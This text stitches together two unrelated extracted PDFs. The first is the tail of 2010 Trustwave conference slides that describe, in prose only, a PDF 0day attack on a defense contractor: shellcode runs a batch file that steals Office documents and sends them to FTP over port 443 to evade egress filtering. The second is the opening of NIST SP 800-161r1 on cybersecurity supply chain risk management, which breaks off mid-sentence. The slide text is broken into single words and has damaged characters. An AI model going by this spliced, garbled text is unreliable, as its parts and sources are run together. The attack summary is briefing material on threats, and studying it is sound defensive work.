normal
PDF
•
PDF
contains
0day
exploit
(in
January
it
was).
•
Shell
code
executes
upon
PDF
launch
•
Shell
code
calls
a
batch
file
which
steals
all
*.docx,
xlsx,
pptx
and
txt
files
from
user’s
My
Documents
folder
•
Stolen
files
are
compressed,
password
protected
and
sent
to
FTP
over
TCP
port
443
Vic@m
US
Defense
Contractor
•
Provides
analyHcs
service
to
US
Military
•
No
inbound
access
allowed
from
the
Internet
without
VPN
•
Egress
filtering
set
to
only
allow
TCP
ports
80
and
443
•
Extremely
secure
environment
compared
to
previous
3
Copyright Trustwave 2010
Sample SL2010-007 – Client-Side PDF Attack
Last One!
Copyright Trustwave 2010
Conclusions (What we learned in the past year)
Customiza@on
of
Malware
•
One
size
fits
all
is
not
the
mantra
of
aFackers
today
Slow
and
Steady
wins
the
race
•
Malware
writers
are
not
in
for
quick
and
dirty
hacks.
Since
data
is
stolen
in
transit,
persistency
is
the
key.
An@Forensics
•
DetecHon
is
not
easy
for
these
new
age
malware.
MAC
Hmes
are
modified;
random
events
configured
and
protecHon
from
detecHon
built
in.
Automa@on
•
AFackers
adding
layers
to
malware
to
automate
tasks
so
that
they
don’t
have
to
come
in
to
the
system
and
risk
detecHon.
Not
Slowing
Down
•
Since
Malware
Freakshow
last
year
at
DEF
CON
17,
the
techniques
have
improved
significantly.
Contact Us:
Nicholas J. Percoco / [email protected] / @c7five
Jibran Ilyas / [email protected] / @jibranilyas | pdf |
NIST Special Publication
NIST SP 800-161r1
Cybersecurity Supply Chain Risk
Management Practices for Systems
and Organizations
Jon Boyens
Angela Smith
Nadya Bartol
Kris Winkler
Alex Holbrook
Matthew Fallon
This publication is available free of charge from:
https://doi.org/10.6028/NIST.SP.800-161r1
NIST Special Publication
NIST SP 800-161r1
Cybersecurity Supply Chain Risk
Management Practices for Systems
and Organizations
Jon Boyens
Angela Smith
Computer Security Division
Information Technology Laboratory
Nadya Bartol
Kris Winkler
Alex Holbrook
Matthew Fallon
Boston Consulting Group
This publication is available free of charge from:
https://doi.org/10.6028/NIST.SP.800-161r1
May 2022
U.S. Department of Commerce
Gina M. Raimondo, Secretary
National Institute of Standards and Technology
Laurie E. Locascio, NIST Director and Undersecretary of Commerce for Standards and Technology
i
Authority
This publication has been developed by NIST in accordance with its statutory responsibilities under the
Federal Information Security Modernization Act (FISMA) of 2014, 44 U.S.C. § 3551 et seq., Public Law
(P.L.) 113-283. NIST is responsible for developing information security standards and guidelines, including
minimum requirements for federal information systems, but such standards and guidelines shall not apply
to national security systems without the express approval of appropriate federal officials exercising policy
authority over such systems. This guideline is consistent with the requirements of the Office of Management
and Budget (OMB) Circular A-130.
Nothing in this publication should be taken to contradict the standards and guidelines made mandatory and
binding on federal agencies by the Secretary of Commerce under statutory authority. Nor should these
guidelines be interpreted as altering or superseding the existing authorities of the Secretary of Commerce,
Director of the OMB, or any other federal official. This publication may be used by nongovernmental
organizations on a voluntary basis and is not subject to copyright in the United States. Attribution would,
however, be appreciated by NIST.
National Institute of Standards and Technology Special Publication 800-161r1
Natl. Inst. Stand. Technol. Spec. Publ. 800-161r1, 326 pages (May 2022)
CODEN: NSPUE2
This publication is available free of charge from:
https://doi.org/10.6028/NIST.SP.800-161r1
Certain commercial entities, equipment, or materials may be identified in this document in order to describe an
experimental procedure or concept adequately. Such identification is not intended to imply recommendation or
endorsement by NIST, nor is it intended to imply that the entities, materials, or equipment are necessarily the best
available for the purpose.
There may be references in this publication to other publications currently under development by NIST in accordance
with its assigned statutory responsibilities. The information in this publication, including concepts and methodologies,
may be used by federal agencies even before the completion of such companion publications. Thus, until each
publication is completed, current requirements, guidelines, and procedures, where they exist, remain operative. For
planning and transition purposes, federal agencies may wish to closely follow the development of these new
publications by NIST.
Organizations are encouraged to review all draft publications during public comment periods and provide feedback to
NIST. Many NIST cybersecurity publications, other than the ones noted above, are available at
https://csrc.nist.gov/publications.
Submit comments on this publication to: [email protected]
National Institute of Standards and Technology
Attn: Computer Security Division, Information Technology Laboratory
100 Bureau Drive (Mail Stop 8930) Gaithersburg, MD 20899-8930
All comments are subject to release under the Freedom of Information Act (FOIA).
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
ii
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Reports on Computer Systems Technology
The Information Technology Laboratory (ITL) at the National Institute of Standards and
Technology (NIST) promotes the U.S. economy and public welfare by providing technical
leadership for the Nation’s measurement and standards infrastructure. ITL develops tests, test
methods, reference data, proof of concept implementations, and technical analyses to advance the
development and productive use of information technology. ITL’s responsibilities include the
development of management, administrative, technical, and physical standards and guidelines for
the cost-effective security and privacy of other than national security-related information in federal
information systems. The Special Publication 800-series reports on ITL’s research, guidelines, and
outreach efforts in information system security, and its collaborative activities with industry,
government, and academic organizations.
Abstract
Organizations are concerned about the risks associated with products and services that may
potentially contain malicious functionality, are counterfeit, or are vulnerable due to poor
manufacturing and development practices within the supply chain. These risks are associated
with an enterprise’s decreased visibility into and understanding of how the technology they
acquire is developed, integrated, and deployed or the processes, procedures, standards, and
practices used to ensure the security, resilience, reliability, safety, integrity, and quality of the
products and services.
This publication provides guidance to organizations on identifying, assessing, and mitigating
cybersecurity risks throughout the supply chain at all levels of their organizations. The
publication integrates cybersecurity supply chain risk management (C-SCRM) into risk
management activities by applying a multilevel, C-SCRM-specific approach, including guidance
on the development of C-SCRM strategy implementation plans, C-SCRM policies, C-SCRM
plans, and risk assessments for products and services.
Keywords
acquire; C-SCRM; cybersecurity supply chain; cybersecurity supply chain risk management;
information and communication technology; risk management; supplier; supply chain; supply
chain risk assessment; supply chain assurance; supply chain risk; supply chain security.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
iii
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Acknowledgments
The authors – Jon Boyens of the National Institute of Standards and Technology (NIST), Angela
Smith (NIST), Nadya Bartol, Boston Consulting Group (BCG), Kris Winkler (BCG), Alex
Holbrook (BCG), and Matthew Fallon (BCG) – would like to acknowledge and thank Alexander
Nelson (NIST), Murugiah Souppaya (NIST), Paul Black (NIST), Victoria Pillitteri (NIST),
Kevin Stine (NIST), Stephen Quinn (NIST), Nahla Ivy (NIST), Isabel Van Wyk (NIST), Jim
Foti (NIST), Matthew Barrett (Cyber ESI), Greg Witte (Huntington Ingalls), R.K. Gardner (New
World Technology Partners), David A. Wheeler (Linux Foundation), Karen Scarfone (Scarfone
Cybersecurity), Natalie Lehr-Lopez (ODNI/NCSC), Halley Farrell (BCG), and the original
authors of NIST SP 800-161, Celia Paulsen (NIST), Rama Moorthy (Hatha Systems), and
Stephanie Shankles (U.S. Department of Veterans Affairs) for their contributions. The authors
would also like to thank the C-SCRM community, which has provided invaluable insight and
diverse perspectives for managing the supply chain, especially the departments and agencies who
shared their experience and documentation on NIST SP 800-161 implementation since its release
in 2015, as well as the public and private members of the Enduring Security Framework who
collaborated to provide input to Appendix F.
Patent Disclosure Notice
NOTICE: The Information Technology Laboratory (ITL) has requested that holders of patent claims
whose use may be required for compliance with the guidance or requirements of this publication
disclose such patent claims to ITL. However, holders of patents are not obligated to respond to ITL
calls for patents and ITL has not undertaken a patent search in order to identify which, if any,
patents may apply to this publication.
As of the date of publication and following call(s) for the identification of patent claims whose use
may be required for compliance with the guidance or requirements of this publication, no such
patent claims have been identified to ITL.
No representation is made or implied by ITL that licenses are not required to avoid patent
infringement in the use of this publication.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
iv
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Table of Contents
INTRODUCTION ........................................................................................................................ 1
1.1. Purpose ........................................................................................................................ 4
1.2. Target Audience .......................................................................................................... 4
1.3. Guidance for Cloud Service Providers ........................................................................ 5
1.4. Audience Profiles and Document Use Guidance ........................................................ 5
1.4.1.
Enterprise Risk Management and C-SCRM Owners and Operators ................................ 5
1.4.2.
Enterprise, Agency, and Mission and Business Process Owners and Operators ............. 5
1.4.3.
Acquisition and Procurement Owners and Operators ...................................................... 6
1.4.4.
Information Security, Privacy, or Cybersecurity Operators ............................................. 6
1.4.5.
System Development, System Engineering, and System Implementation Personnel ...... 7
1.5. Background ................................................................................................................. 7
1.5.1.
Enterprise’s Supply Chain ................................................................................................ 9
1.5.2.
Supplier Relationships Within Enterprises .................................................................... 10
1.6. Methodology for Building C-SCRM Guidance Using NIST SP 800-39; NIST SP 800-
37, Rev 2; and NIST SP 800-53, Rev 5 ..................................................................... 13
1.7. Relationship to Other Publications and Publication Summary ................................. 14
INTEGRATION OF C-SCRM INTO ENTERPRISE-WIDE RISK MANAGEMENT ..... 18
2.1. The Business Case for C-SCRM ............................................................................... 19
2.2. Cybersecurity Risks Throughout Supply Chains ...................................................... 20
2.3. Multilevel Risk Management .................................................................................... 22
2.3.1.
Roles and Responsibilities Across the Three Levels ...................................................... 23
2.3.2.
Level 1 – Enterprise ....................................................................................................... 27
2.3.3.
Level 2 – Mission and Business Process ........................................................................ 30
2.3.4.
Level 3 – Operational ..................................................................................................... 32
2.3.5.
C-SCRM PMO ............................................................................................................... 34
CRITICAL SUCCESS FACTORS ........................................................................................... 37
3.1. C-SCRM in Acquisition ............................................................................................ 37
3.1.1.
Acquisition in the C-SCRM Strategy and Implementation Plan .................................... 38
3.1.2.
The Role of C-SCRM in the Acquisition Process .......................................................... 39
3.2. Supply Chain Information Sharing ............................................................................ 43
3.3. C-SCRM Training and Awareness ............................................................................ 45
3.4. C-SCRM Key Practices ............................................................................................. 46
3.4.1.
Foundational Practices ................................................................................................... 47
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
v
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
3.4.2.
Sustaining Practices ....................................................................................................... 48
3.4.3.
Enhancing Practices ....................................................................................................... 49
3.5. Capability Implementation Measurement and C-SCRM Measures .......................... 49
3.5.1.
Measuring C-SCRM Through Performance Measures .................................................. 52
3.6. Dedicated Resources ................................................................................................. 54
REFERENCES ................................................................................................................................... 58
APPENDIX A: C-SCRM SECURITY CONTROLS ..................................................................... 64
C-SCRM CONTROLS INTRODUCTION ...................................................................... 64
C-SCRM CONTROLS SUMMARY ........................................................................................... 64
C-SCRM CONTROLS THROUGHOUT THE ENTERPRISE .................................................. 65
APPLYING C-SCRM CONTROLS TO ACQUIRING PRODUCTS AND SERVICES ........... 65
SELECTING, TAILORING, AND IMPLEMENTING C-SCRM SECURITY CONTROLS ... 68
C-SCRM SECURITY CONTROLS ................................................................................. 71
FAMILY: ACCESS CONTROL ................................................................................................. 71
FAMILY: AWARENESS AND TRAINING .............................................................................. 77
FAMILY: AUDIT AND ACCOUNTABILITY .......................................................................... 80
FAMILY: ASSESSMENT, AUTHORIZATION, AND MONITORING .................................. 84
FAMILY: CONFIGURATION MANAGEMENT ..................................................................... 87
FAMILY: CONTINGENCY PLANNING .................................................................................. 97
FAMILY: IDENTIFICATION AND AUTHENTICATION .................................................... 101
FAMILY: INCIDENT RESPONSE .......................................................................................... 104
FAMILY: MAINTENANCE ..................................................................................................... 109
FAMILY: MEDIA PROTECTION ........................................................................................... 113
FAMILY: PHYSICAL AND ENVIRONMENTAL PROTECTION........................................ 115
FAMILY: PLANNING .............................................................................................................. 119
FAMILY: PROGRAM MANAGEMENT ................................................................................ 122
FAMILY: PERSONNEL SECURITY ...................................................................................... 128
FAMILY: PERSONALLY IDENTIFIABLE INFORMATION PROCESSING AND
TRANSPARENCY .................................................................................................................... 130
FAMILY: RISK ASSESSMENT .............................................................................................. 131
FAMILY: SYSTEM AND SERVICES ACQUISITION .......................................................... 134
FAMILY: SYSTEM AND COMMUNICATIONS PROTECTION ......................................... 143
FAMILY: SYSTEM AND INFORMATION INTEGRITY ..................................................... 149
FAMILY: SUPPLY CHAIN RISK MANAGEMENT .............................................................. 153
APPENDIX B: C-SCRM CONTROL SUMMARY...................................................................... 158
APPENDIX C: RISK EXPOSURE FRAMEWORK .................................................................... 166
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
vi
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
SAMPLE SCENARIOS.................................................................................................. 171
SCENARIO 1: Influence or Control by Foreign Governments Over Suppliers ........................ 171
SCENARIO 2: Telecommunications Counterfeits .................................................................... 176
SCENARIO 3: Industrial Espionage ......................................................................................... 180
SCENARIO 4: Malicious Code Insertion .................................................................................. 185
SCENARIO 5: Unintentional Compromise ............................................................................... 188
SCENARIO 6: Vulnerable Reused Components Within Systems ............................................ 192
APPENDIX D: C-SCRM TEMPLATES ....................................................................................... 196
1.
C-SCRM STRATEGY AND IMPLEMENTATION PLAN .................................. 196
1.1. . C-SCRM Strategy and Implementation Plan Template ..................................................... 196
2.
C-SCRM POLICY .................................................................................................. 203
2.1. . C-SCRM Policy Template ................................................................................................. 203
3.
C-SCRM PLAN ...................................................................................................... 208
3.1. . C-SCRM Plan Template .................................................................................................... 208
4.
CYBERSECURITY SUPPLY CHAIN RISK ASSESSMENT TEMPLATE ........ 218
4.1. . C-SCRM Template ............................................................................................................ 218
APPENDIX E: FASCSA ................................................................................................................. 233
INTRODUCTION .......................................................................................................... 233
Purpose, Audience, and Background ......................................................................................... 233
Scope .......................................................................................................................................... 233
Relationship to NIST SP 800-161, Rev. 1, Cybersecurity Supply Chain Risk Management Practices
for Systems and Organizations .................................................................................................. 234
SUPPLY CHAIN RISK ASSESSMENTS (SCRAs) ..................................................... 235
General Information ................................................................................................................... 235
Baseline Risk Factors (Common, Minimal) .............................................................................. 236
Risk Severity Schema ................................................................................................................ 246
Risk Response Guidance ........................................................................................................... 247
ASSESSMENT DOCUMENTATION AND RECORDS MANAGEMENT ................ 249
Content Documentation Guidance ............................................................................................. 249
Assessment Record .................................................................................................................... 251
APPENDIX F: RESPONSE TO EXECUTIVE ORDER 14028’s CALL TO PUBLISH
GUIDELINES FOR ENHANCING SOFTWARE SUPPLY CHAIN SECURITY ................... 252
APPENDIX G: C-SCRM ACTIVITIES IN THE RISK MANAGEMENT PROCESS ............ 253
TARGET AUDIENCE ................................................................................................... 255
ENTERPRISE-WIDE RISK MANAGEMENT AND THE RMF ................................. 255
Frame ......................................................................................................................................... 255
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
vii
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Assess ........................................................................................................................................ 277
Respond ..................................................................................................................................... 287
Monitor ...................................................................................................................................... 293
APPENDIX H: GLOSSARY .......................................................................................................... 298
APPENDIX I: ACRONYMS .......................................................................................................... 307
APPENDIX J: RESOURCES ......................................................................................................... 313
RELATIONSHIP TO OTHER PROGRAMS AND PUBLICATIONS ......................... 313
NIST Publications ...................................................................................................................... 313
Regulatory and Legislative Guidance ........................................................................................ 314
Other U.S. Government Reports ................................................................................................ 315
Standards, Guidelines, and Best Practices ................................................................................. 315
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
viii
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
List of Figures
Fig. 1-1: Dimensions of C-SCRM ................................................................................................ 8
Fig. 1-2: An Enterprise’s Visibility, Understanding, and Control of its Supply Chain ....... 11
Fig. 2-1: Risk Management Process .......................................................................................... 18
Fig. 2-2: Cybersecurity Risks Throughout the Supply Chain ................................................ 21
Fig. 2-3: Multilevel Enterprise-Wide Risk Management ........................................................ 22
Fig. 2-4: C-SCRM Documents in Multilevel Enterprise-wide Risk Management ................ 23
Fig. 2-5: Relationship Between C-SCRM Documents ............................................................. 27
Fig. 3-1: C-SCRM Metrics Development Process .................................................................... 52
Fig. A-1: C-SCRM Security Controls in NIST SP 800-161, Rev. 1 ........................................ 65
Fig. D-1: Example C-SCRM Plan Life Cycle ......................................................................... 217
Fig. D-2: Example Likelihood Determination ........................................................................ 230
Fig. D-3: Example Risk Exposure Determination ................................................................. 230
Fig. G-1: Cybersecurity Supply Chain Risk Management (C-SCRM) ................................ 253
Fig. G-2: C-SCRM Activities in the Risk Management Process .......................................... 254
Fig. G-3: C-SCRM in the Frame Step ..................................................................................... 257
Fig. G-4: Risk Appetite and Risk Tolerance .......................................................................... 274
Fig. G-5: Risk Appetite and Risk Tolerance Review Process ............................................... 275
Fig. G-6: C-SCRM in the Assess Step ..................................................................................... 279
Fig. G-7: C-SCRM in the Respond Step ................................................................................. 288
Fig. G-8: C-SCRM in the Monitor Step .................................................................................. 295
List of Tables
Table 2-1: Cybersecurity Supply Chain Risk Management Stakeholders ............................ 24
Table 3-1: C-SCRM in the Procurement Process .................................................................... 41
Table 3-2: Supply Chain Characteristics and Cybersecurity Risk Factors Associated with a
Product, Service, or Source of Supply ...................................................................................... 44
Table 3-3: Example C-SCRM Practice Implementation Model ............................................. 51
Table 3-4: Example Measurement Topics Across the Risk Management Levels ................. 53
Table A-1: C-SCRM Control Format ....................................................................................... 69
Table B-1: C-SCRM Control Summary ................................................................................. 158
Table C-1: Sample Risk Exposure Framework ..................................................................... 169
Table C-2: Scenario 1 ............................................................................................................... 173
Table C-3: Scenario 2 ............................................................................................................... 178
Table C-4: Scenario 3 ............................................................................................................... 182
Table C-5: Scenario 4 ............................................................................................................... 186
Table C-6: Scenario 5 ............................................................................................................... 189
Table C-6: Scenario 6 ............................................................................................................... 193
Table D-1: Objective 1 – Implementation milestones to effectively manage cybersecurity
risks throughout the supply chain ........................................................................................... 199
Table D-2: Objective 2 – Implementation milestones for serving as a trusted source of
supply for customers ................................................................................................................. 200
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
ix
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Table D-3: Objective 3 – Implementation milestones to position the enterprise as an
industry leader in C-SCRM ..................................................................................................... 201
Table D-4: Version Management Table .................................................................................. 202
Table D-5: Version Management Table .................................................................................. 208
Table D-6: System Information Type and Categorization .................................................... 210
Table D-7: Security Impact Categorization ........................................................................... 210
Table D-8: System Operational Status .................................................................................... 211
Table D-9: Information Exchange and System Connections ................................................ 212
Table D-10: Role Identification ............................................................................................... 214
Table D-11: Revision and Maintenance .................................................................................. 216
Table D-12: Acronym List........................................................................................................ 216
Table D-13: Information Gathering and Scoping Analysis .................................................. 220
Table D-14: Version Management Table ................................................................................ 232
Table E-1: Baseline Risk Factors............................................................................................. 238
Table E-2: Risk Severity Schema ............................................................................................ 247
Table E-3: Assessment Record – Minimal Scope of Content and Documentation ............. 250
Table G-1: Examples of Supply Chain Cybersecurity Threat Sources and Agents ........... 261
Table G-2: Supply Chain Cybersecurity Threat Considerations ......................................... 264
Table G-3: Supply Chain Cybersecurity Vulnerability Considerations .............................. 266
Table G-4: Supply Chain Cybersecurity Consequence and Impact Considerations ......... 268
Table G-5: Supply Chain Cybersecurity Likelihood Considerations .................................. 270
Table G-6: Supply Chain Constraints .................................................................................... 271
Table G-7: Supply Chain Risk Appetite and Risk Tolerance ............................................... 275
Table G-8: Examples of Supply Chain Cybersecurity Vulnerabilities Mapped to the
Enterprise Levels ...................................................................................................................... 283
Table G-9: Controls at Levels 1, 2, and 3 ............................................................................... 292
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
1
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
INTRODUCTION
nformation and communications technology (ICT) and operational technology (OT) rely on a
complex, globally distributed, extensive, and interconnected supply chain ecosystem that is
comprised of geographically diverse routes and consists of multiple levels of outsourcing.
This ecosystem is composed of public and private sector entities (e.g., acquirers, suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related
service providers)1 that interact to research, develop, design, manufacture, acquire, deliver,
integrate, operate, maintain, dispose of, and otherwise utilize or manage ICT/OT products and
services. These interactions are shaped and influenced by a set of technologies, laws, policies,
procedures, and practices.
This ecosystem has evolved to provide a set of highly refined, cost-effective, and reusable
solutions. Public and private sector entities have rapidly adopted this ecosystem of solutions and
increased their reliance on commercially available products, system integrator support for
custom-built systems, and external service providers. This, in turn, has increased the complexity,
diversity, and scale of these entities.
In this document, the term supply chain refers to the linked set of resources and processes
between and among multiple levels of an enterprise, each of which is an acquirer that begins
with the sourcing of products and services and extends through the product and service life
cycle.
Given the definition of supply chain, cybersecurity risks throughout the supply chain2,3 refers
to the potential for harm or compromise that may arise from suppliers, their supply chains, their
products, or their services. Cybersecurity risks throughout the supply chain are the results of
threats that exploit vulnerabilities or exposures within products and services that traverse the
supply chain or threats that exploit vulnerabilities or exposures within the supply chain itself.
Examples of cybersecurity risks throughout the supply chain include:
1) A widget manufacturer whose design material is stolen in another country, resulting in the
loss of intellectual property and market share.
2) A widget manufacture that experiences a supply disruption for critical manufacturing
components due to a ransomware attack at a supplier three tiers down in the supply chain.
3) A store chain that experiences a massive data breach tied to an HVAC vendor with access to
the store chain’s data-sharing portal.
Note that SCRM and C-SCRM refer to the same concept for the purposes of NIST publications.
In general practice, C-SCRM is at the nexus of traditional Supply Chain Risk Management
1 See the Glossary for definitions for suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers.
2 In the 2015 version of SP 800-161, NIST used the term “ICT supply chain.” In this revision, NIST has intentionally moved away from this term
as cybersecurity risks can arise in all product and service supply chains, including both ICT and non-technology supply chains.
3 In an effort to harmonize terminology, the expression “cybersecurity risk in supply chains” should be considered equivalent to “cyber risk in
supply chains” for the purposes of this document. In the same manner, the expression “cybersecurity supply chain risk management” should be
considered equivalent to “cyber supply chain risk management.”
I
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
2
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
(SCRM) and traditional Information Security. Organizations may employ different terms and
definitions for SCRM outside of the scope of this publication. This publication does not address
many of the non-cybersecurity aspects of SCRM.
Technology solutions provided through a supply chain of competing vendors offer significant
benefits, including low cost, interoperability, rapid innovation, and product feature variety.
Whether proprietary, government-developed, or open source, these solutions can meet the needs
of a global base of public and private sector customers. However, the same factors that create
such benefits also increase the potential for cybersecurity risks that arise directly or indirectly
from the supply chain. Cybersecurity risks throughout the supply chain are often undetected and
impact the acquirer and the end-user. For example, deployed software is typically a commercial
off-the-shelf (COTS) product, which includes smaller COTS or open source software
components developed or sourced at multiple tiers. Updates to software deployed across
enterprises often fail to update the smaller COTS components with known vulnerabilities,
including cases in which the component vulnerabilities are exploitable in the larger enterprise
software. Software users may be unable to detect the smaller known vulnerable components in
larger COTS software (e.g., lack of transparency, insufficient vulnerability management, etc.).
The non-standardized nature of C-SCRM practices adds an additional layer of complexity as this
makes the consistent measurement and management of cybersecurity risks throughout the supply
chain difficult for both the organization and members of its supply chain (e.g., suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related
service providers).
In this document, the practices and controls described for Cybersecurity Supply Chain Risk
Management (C-SCRM) apply to both information technology (IT) and operational technology
(OT) environments and is inclusive of IoT. Similar to IT environments that rely on ICT
products and services, OT environments rely on OT and ICT products and services, with
cybersecurity risks arising from ICT/OT products, services, suppliers, and their supply chains.
Enterprises should include OT-related suppliers, developers, system integrators, external system
service providers, and other ICT/OT-related service providers within the scope of their C-
SCRM activities.
When engaging with suppliers, developers, system integrators, external system service providers,
and other ICT/OT-related service providers, agencies should carefully consider the breadth of the
Federal Government’s footprint and the high likelihood that individual agencies may enforce
varying and conflicting C-SCRM requirements. Overcoming this complexity requires
interagency coordination and partnerships. The passage of the Federal Acquisition Supply Chain
Security Act (FASCSA) of 2018 aimed to address this concern by creating a government-wide
approach to the problem of supply chain security in federal acquisitions by establishing the
Federal Acquisition Security Council (FASC). The FASC serves as a focal point of coordination
and information sharing and a harmonized approach to acquisition security that addresses C-
SCRM in acquisition processes and procurements across the federal enterprise. In addition, the
law incorporated SCRM into FISMA by requiring reports on the progress and effectiveness of
the agency’s supply chain risk management, consistent with guidance issued by the Office of
Management and Budget (OMB) and the Council.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
3
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Note that this publication uses the term “enterprise” to describe Level 1 of the risk management
hierarchy. In practice, an organization is defined as an entity of any size, complexity, or
positioning within a larger enterprise structure (e.g., a federal agency or company). By this
definition, an enterprise is an organization, but it exists at the top level of the hierarchy where
individual senior leaders have unique risk management responsibilities [NISTIR 8286]. Several
organizations may comprise an enterprise. In these cases, an enterprise may have multiple Level
1s with stakeholders and activities defined at both the enterprise and the organization levels.
Level 1 activities conducted at the enterprise level should inform those activities completed
within the subordinate organizations. Enterprises and organizations tailor the C-SCRM practices
described in this publication as applicable and appropriate based on their own unique enterprise
structure. There are cases in this publication in which the term “organization” is inherited from a
referenced source (e.g., other NIST publication, regulatory language). Refer to NISTIR 8286,
Integrating Cybersecurity and Enterprise Risk Management (ERM), for further guidance on this
topic.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
4
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
1.1.
Purpose
Cybersecurity Supply Chain Risk Management (C-SCRM) is a systematic process for managing
exposure to cybersecurity risks throughout the supply chain and developing appropriate response
strategies, policies, processes, and procedures. The purpose of this publication is to provide
guidance to enterprises on how to identify, assess, select, and implement risk management
processes and mitigating controls across the enterprise to help manage cybersecurity risks
throughout the supply chain. The content in this guidance is the shared responsibility of different
disciplines with different SCRM perspectives, authorities, and legal considerations.
The C-SCRM guidance provided in this document is not one-size-fits-all. Instead, the guidance
throughout this publication should be adopted and tailored to the unique size, resources, and risk
circumstances of each enterprise. Enterprises adopting this guidance may vary in how they
implement C-SCRM practices internally. To that end, this publication describes C-SCRM
practices observed in enterprises and offers a general prioritization of C-SCRM practices (i.e.,
Foundational, Sustaining, Enabling)4 for enterprises to consider as they implement and mature
C-SCRM. However, this publication does not offer a specific roadmap for enterprises to follow
to reach various states of capability and maturity.
The processes and controls identified in this document can be modified or augmented with
enterprise-specific requirements from policies, guidelines, response strategies, and other sources.
This publication empowers enterprises to develop C-SCRM strategies tailored to their specific
mission and business needs, threats, and operational environments.
1.2.
Target Audience
C-SCRM is an enterprise-wide activity that should be directed as such from a governance
perspective, regardless of the specific enterprise structure.
This publication is intended to serve a diverse audience involved in C-SCRM, including:
• Individuals with system, information security, privacy, or risk management and oversight
responsibilities, including authorizing officials (AOs), chief information officers, chief
information security officers, and senior officials for privacy;
• Individuals with system development responsibilities, including mission or business owners,
program managers, system engineers, system security engineers, privacy engineers, hardware
and software developers, system integrators, and acquisition or procurement officials;
• Individuals with project management-related responsibilities, including certified project
managers and/or integrated project team (IPT) members;
• Individuals with acquisition and procurement-related responsibilities, including acquisition
officials and contracting officers;
4 Refer to Section 3.4 of this publication.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
5
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
• Individuals with logistical or disposition-related responsibilities, including program
managers, procurement officials, system integrators, and property managers;
• Individuals with security and privacy implementation and operations responsibilities,
including mission or business owners, system owners, information owners or stewards,
system administrators, continuity planners, and system security or privacy officers;
• Individuals with security and privacy assessment and monitoring responsibilities, including
auditors, Inspectors General, system evaluators, control assessors, independent verifiers and
validators, and analysts; and
• Commercial entities, including industry partners, that produce component products and
systems, create security and privacy technologies, or provide services or capabilities that
support information security or privacy.
1.3.
Guidance for Cloud Service Providers
The external system service providers discussed in this publication include cloud service
providers. This publication does not replace the guidance provided with respect to federal agency
assessments of cloud service providers’ security. When applying this publication to cloud service
providers, federal agencies should first use Federal Risk and Authorization Program (FedRAMP)
cloud services security guidelines and then apply this document for those processes and controls
that are not addressed by FedRAMP.5
1.4.
Audience Profiles and Document Use Guidance
Given the wide audience of this publication, several reader profiles have been defined to point
readers to the sections of the document that most closely pertain to their use case. Some readers
will belong to multiple profiles and should consider reading all applicable sections. Any reader
accountable for the implementation of a C-SCRM capability or function within their enterprise,
regardless of role, should consider the entire document applicable to their use case.
1.4.1. Enterprise Risk Management and C-SCRM Owners and Operators
These readers are those responsible for enterprise risk management and cybersecurity supply
chain risk management. These readers may help develop C-SCRM policies and standards,
perform assessments of cybersecurity risks throughout the supply chain, and serve as subject
matter experts for the rest of the enterprise. The entire document is relevant to and recommended
for readers fitting this profile.
1.4.2. Enterprise, Agency, and Mission and Business Process Owners and Operators
These readers are the personnel responsible for the activities that create and/or manage risk
within the enterprise. They may also own the risk as part of their duties within the mission or
business process. They may have responsibilities for managing cybersecurity risks throughout
5 For cloud services, FedRAMP is applicable for low-, moderate-, high-impact systems [FedRAMP].
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
6
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
the supply chain for the enterprise. Readers in this group may seek general knowledge and
guidance on Cybersecurity Supply Chain Risk Management. Recommended reading includes:
